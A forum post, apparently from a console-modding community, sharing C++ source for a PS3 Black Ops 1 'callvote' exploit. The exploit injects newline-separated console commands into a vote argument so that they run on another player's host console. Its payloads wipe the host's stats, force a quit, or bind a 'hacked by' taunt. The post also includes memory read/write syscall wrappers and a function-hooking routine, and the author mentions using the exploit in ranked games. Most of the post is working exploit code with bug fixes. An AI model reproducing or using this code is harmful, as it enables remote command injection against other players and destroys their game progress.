THREAD: Bo1 Non-Host Infection A.K.A. CallVote Exploit
    If all clients stats ain't released here's the alternative =D

    /*Bo1 Nonhost Infection A.K.A. CallVote Exploit
    Credits:
    https://old.zenhax.com/quake3-engine-callvote-bug-t686.html

    Luigi for documenting the Quake 3 callvote exploit
    01cedricv2 for showing Quake documentation to Jo-Milk
    and Jo-Milk for porting to PS3

    This can be ported to Bo2 [tested] and other CoDs.
    It infects the host once the vote passes. To set that up,
    join your friend in a private match; he needs to be the host.
    1st way: tell him to go spectator, then you spawn in and use Cbuf_AddText.
    2nd way: everyone leaves or goes spectator [besides the host], so the host is the one who gets infected.

    This exploit is hard to use online on PS3. My main use of it is to prestige my friends without going on their accounts, but if you had a few jailbroken consoles you could bind a button to "cmd vote yes" and push the callvote through in a ranked game.
    */

    #define TOC 0x0072DCE8 // Black Ops 1 patch 1.13: TOC (r2) value the game's own functions expect
    // Payload selector read by MSG_WriteReliableCommand_Hook: 0 = bind + rank, 1 = quit, 2 = resetStats.
    int var = 1;

    // PS3 function descriptor (OPD entry) for the game's Cbuf_AddText at the 1.13 address:
    // { code address, TOC }. Taking the address of this two-word array and casting it to a
    // function pointer lets us call straight into the game's command buffer.
    using CbufAddTextFn = void (*)(int client, char* cmd);
    int cbuf[] = { 0x00399CC8, TOC };
    CbufAddTextFn CBuf_AddText = reinterpret_cast<CbufAddTextFn>(&cbuf);

    // Trampoline that HookFunctionStart turns into a call to the ORIGINAL MSG_WriteReliableCommand.
    // The seven nops are placeholders: HookFunctionStart overwrites 0x20 bytes (8 instructions) at this
    // function's code address with the 4 instructions it saved from the original function plus a
    // 4-instruction jump to original+0x10. The 8th slot is expected to be the compiler's trailing blr.
    // NOTE(review): this only works if the compiler places the nops at the very start of the function
    // with no prologue in front of them -- confirm in the disassembly, and do not add code here.
    void MSG_WriteReliableCommand_HookStub(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos) {
    __nop();  // slot 0 -- patched at runtime
    __nop();  // slot 1
    __nop();  // slot 2
    __nop();  // slot 3
    __nop();  // slot 4
    __nop();  // slot 5
    __nop();  // slot 6
    }

    // Hook installed over the game's MSG_WriteReliableCommand (see the HookFunctionStart call below).
    // Its signature mirrors the game's so the arguments can be forwarded untouched. Every reliable
    // command the local client sends passes through here; when it is the marker string our own
    // Cbuf_AddText call produces ("...;Jo-Milk"), it is swapped for one of the payloads below before
    // being handed to the original function through the trampoline stub.
    //
    // Mechanism (the Quake 3 "callvote" bug, as the listing's own comments describe it): once the vote
    // passes, the host feeds the vote's map argument into its own command buffer, so the '\n'
    // characters embedded in the payload end the callvote line and make everything after them run as
    // separate console commands on the host. The marker uses ';' instead of '\n' so the injected line
    // is NOT also executed on the sender (see the comment after this function).
    //
    // NOTE(review): the host-side defence is input validation -- a server that rejects '\n' (and ';')
    // inside vote arguments is not affected. Only use this against consoles you own or are authorised
    // to test; payloads 0 and 2 alter or destroy another player's stats.
    void MSG_WriteReliableCommand_Hook(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos)
    {
        // Payloads, indexed by the global `var`. Each is a complete callvote carrying injected host commands.
        static const char *const kPayloads[] = {
            // 0: bind a taunt on the host's back button and set RANK 50 (author notes the rank part is not fully working)
            "callvote map \"mp_nuked\nbind button_back say ^1hacked by ^2Jo-Milk ^1Visit ^5www.youtube.com/c/JoMilk15MoDz for More\nstatsetbyname RANK 50\n\"",
            // 1: "quit" -- drops the host back to the XMB
            "callvote map \"mp_nuked\nquit\n\"",
            // 2: "resetStats" -- wipes the host's stats (derank)
            "callvote map \"mp_nuked\nresetStats\n\"",
        };
        const int payloadCount = static_cast<int>(sizeof(kPayloads) / sizeof(kPayloads[0]));

        // Anything that is not our marker, or an out-of-range `var`, is forwarded unchanged.
        // If the marker never matches here, the author suggests trying pszBuffer instead.
        const char *forwarded = pszCommand;
        if (strcmp(pszCommand, "callvote map mp_nuked;Jo-Milk") == 0 && var >= 0 && var < payloadCount)
        {
            forwarded = kPayloads[var];
        }
        MSG_WriteReliableCommand_HookStub(forwarded, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos);
    }
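    /* Why the two different separators: in the hook above the ';' of the marker is replaced by '\n', so
       the host runs every injected line as its own console command. Here, in the command fed to our OWN
       Cbuf_AddText, the separator must stay ';' -- otherwise our own console would execute the injected
       lines locally before the callvote is ever sent. */

    /* Send the marker vote. Call this from somewhere outside MSG_WriteReliableCommand_Hook (a button
       handler, for instance), presumably after HookFunctionStart has installed the hook, since the hook
       is what rewrites the marker into the real payload.
       Fix versus the original listing: the call was spelled cBuf_Addtext, which does not match the
       CBuf_AddText function pointer declared above and therefore does not compile. */
    CBuf_AddText(0, "cmd callvote map \"mp_nuked;Jo-Milk\"\n");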

    /*--------------------------------------------------Extra----------------------------------------------------------------------*/
    //read write syscalls
    // Reads `size` bytes of the running game process at `address` into `data` via lv2 syscall 904
    // (sys_dbg_read_process_memory). This is a privileged debug syscall; the listing assumes a
    // jailbroken console (see the header comment). Returns whatever the syscall leaves in r3,
    // presumably the lv2 status code.
    int32_t sys_dbg_read_process_memory(uint64_t address, void *data, size_t size)
    {
        const uint64_t pid = static_cast<uint64_t>(sys_process_getpid());
        system_call_4(904, pid, address, size, reinterpret_cast<uint64_t>(data));
        return_to_user_prog(int32_t);
    }

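    // Typed wrapper over sys_dbg_read_process_memory for reading into an object held by the caller:
    //     uint32_t opcode; ReadProcessMemory(addr, opcode, sizeof opcode);
    // Fix versus the original listing: it took `T data` BY VALUE and passed `&data`, so the syscall
    // filled a local copy that was discarded on return and the caller's variable never changed.
    // `size` should not exceed sizeof(T). Returns the syscall status.
    template<typename T>
    int32_t ReadProcessMemory(uint32_t address, T& data, size_t size)
    {
        return sys_dbg_read_process_memory(address, &data, size);
    }

    // Overload for callers that already hold a destination pointer or array
    // (`char buf[16]; ReadProcessMemory(addr, buf, sizeof buf);`). Under the original by-value
    // signature this case wrote into a copy of the pointer itself; here the bytes land in the buffer
    // it points to. Partial ordering makes this overload win whenever the argument is a pointer/array.
    template<typename T>
    int32_t ReadProcessMemory(uint32_t address, T* data, size_t size)
    {
        return sys_dbg_read_process_memory(address, data, size);
    }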

    // Writes `size` bytes from `data` into the game process at `address` via lv2 syscall 905
    // (sys_dbg_write_process_memory), the write-side counterpart of the read above and likewise a
    // privileged debug syscall that the listing assumes is available on a jailbroken console.
    // Returns whatever the syscall leaves in r3, presumably the lv2 status code.
    int32_t sys_dbg_write_process_memory(uint64_t address, const void *data, size_t size)
    {
        const uint64_t pid = static_cast<uint64_t>(sys_process_getpid());
        system_call_4(905, pid, address, size, reinterpret_cast<uint64_t>(data));
        return_to_user_prog(int32_t);
    }

    template<typename T>
    int32_t WriteProcessMemory(uint32_t address, const T value, size_t size)
    {
    return sys_dbg_write_process_memory(address, &value, size);
    }

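    // Encodes the 4-instruction PowerPC sequence  lis r11,hi ; ori r11,r11,lo ; mtctr r11 ; bctr
    // that jumps to the absolute address `target`. Shared by the detour and the trampoline so the
    // opcodes are written out once.
    static void EncodeAbsoluteJump(uint32_t target, uint32_t out[4])
    {
        out[0] = 0x3D600000 | ((target >> 16) & 0xFFFF); // lis   r11, target@h
        out[1] = 0x616B0000 | (target & 0xFFFF);         // ori   r11, r11, target@l
        out[2] = 0x7D6903A6;                             // mtctr r11
        out[3] = 0x4E800420;                             // bctr
    }

    // Detours the function at `functionStartAddress` to `newFunction`, keeping a way back through
    // `functionStub`:
    //   1. the target's first 4 instructions (0x10 bytes) are copied into the stub, followed by a jump
    //      to target+0x10, so calling the stub behaves like calling the original function;
    //   2. the target's first 4 instructions are replaced with a jump to `newFunction`.
    // All three arguments are raw code addresses (for a C++ function use the OPD trick at the call
    // site: *(uint32_t*)func). `functionStub` must provide 8 instructions (0x20 bytes) of space.
    // Fixes versus the original listing: the missing ';' after the bctr assignment (a syntax error);
    // the `a + b >> 16` expression, which relied on '+' binding tighter than '>>', is now explicit.
    // NOTE(review): the 4 relocated instructions are copied verbatim; if any of them is a PC-relative
    // branch (b/bl/bc) it will resolve to the wrong address from inside the stub -- check the target's
    // prologue in a disassembler before hooking. The syscall status codes are not checked.
    void HookFunctionStart(uint32_t functionStartAddress, uint32_t newFunction, uint32_t functionStub)
    {
        uint32_t normalFunctionStub[8] = {0};
        uint32_t hookFunctionStub[4] = {0};

        // Trampoline: saved original prologue + jump back to the rest of the original function.
        sys_dbg_read_process_memory(functionStartAddress, normalFunctionStub, 0x10);
        EncodeAbsoluteJump(functionStartAddress + 0x10, &normalFunctionStub[4]);
        sys_dbg_write_process_memory(functionStub, normalFunctionStub, 0x20);

        // Detour: overwrite the start of the original with a jump to the hook.
        EncodeAbsoluteJump(newFunction, hookFunctionStub);
        sys_dbg_write_process_memory(functionStartAddress, hookFunctionStub, 0x10);
    }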

    // Install the hook over the game's MSG_WriteReliableCommand (hard-coded address, presumably for
    // patch 1.13 like TOC above). On PS3 a function name evaluates to the address of its OPD
    // descriptor, whose first word is the real code address -- hence the *(uint32_t*) dereference to
    // get something HookFunctionStart can patch. Like the Cbuf_AddText call, this belongs in an init
    // routine rather than at file scope.
    HookFunctionStart(0x3CCAF8,
                      *reinterpret_cast<uint32_t*>(MSG_WriteReliableCommand_Hook),
                      *reinterpret_cast<uint32_t*>(MSG_WriteReliableCommand_HookStub));






    PLEASE keep the credits how it is
    Niceeeeeeeeeee Happy


    Reported haxor nub. Jokes good work bish Winky Winky